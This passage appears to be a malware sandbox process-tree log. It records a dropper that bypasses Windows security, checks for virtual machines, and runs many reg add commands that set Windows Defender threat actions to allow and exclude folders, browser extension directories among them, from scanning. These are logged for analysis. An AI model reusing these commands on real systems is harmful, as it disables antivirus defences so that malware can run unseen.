C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291834311\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291834311\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:2696 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291834311\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291834311\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5044 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291834311\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291834311\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0xcc,0x240,0xb56038,0xb56044,0xb560505⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3912 -
C:\Users\Admin\Pictures\cZ66OwyuU2YlIR1ARlg2uowi.exe"C:\Users\Admin\Pictures\cZ66OwyuU2YlIR1ARlg2uowi.exe"3⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4732 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2028
-
C:\Users\Admin\AppData\Local\Temp\7zS8712.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS8712.tmp\Install.exe Wt /XpTdidYNoS 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:2784
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5036
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:3564
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3372
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:3784
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1284
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:3464
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:2244
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:3704
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3576
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:396
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:1304
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2060
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2312
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4696
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4092
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3840
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4808
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1152
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2576
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1424
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1072
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5004
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1768
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1824
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2556
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3476
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2524
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2620
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2784
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1656
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3156
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4424
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4800
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2012
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4712
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3468
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2652
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2084
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3028
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1524
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:323⤵PID:1472
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵PID:560
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:643⤵PID:3576
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:323⤵PID:3064
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:643⤵PID:1304
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:323⤵PID:4092
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:643⤵PID:4808
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:323⤵PID:1152
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:643⤵PID:1676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:323⤵PID:2576
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:643⤵PID:1424
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:323⤵PID:3696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:643⤵PID:4308
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:744
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3728
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:323⤵PID:5056
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:643⤵PID:1816
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:323⤵PID:1948
-
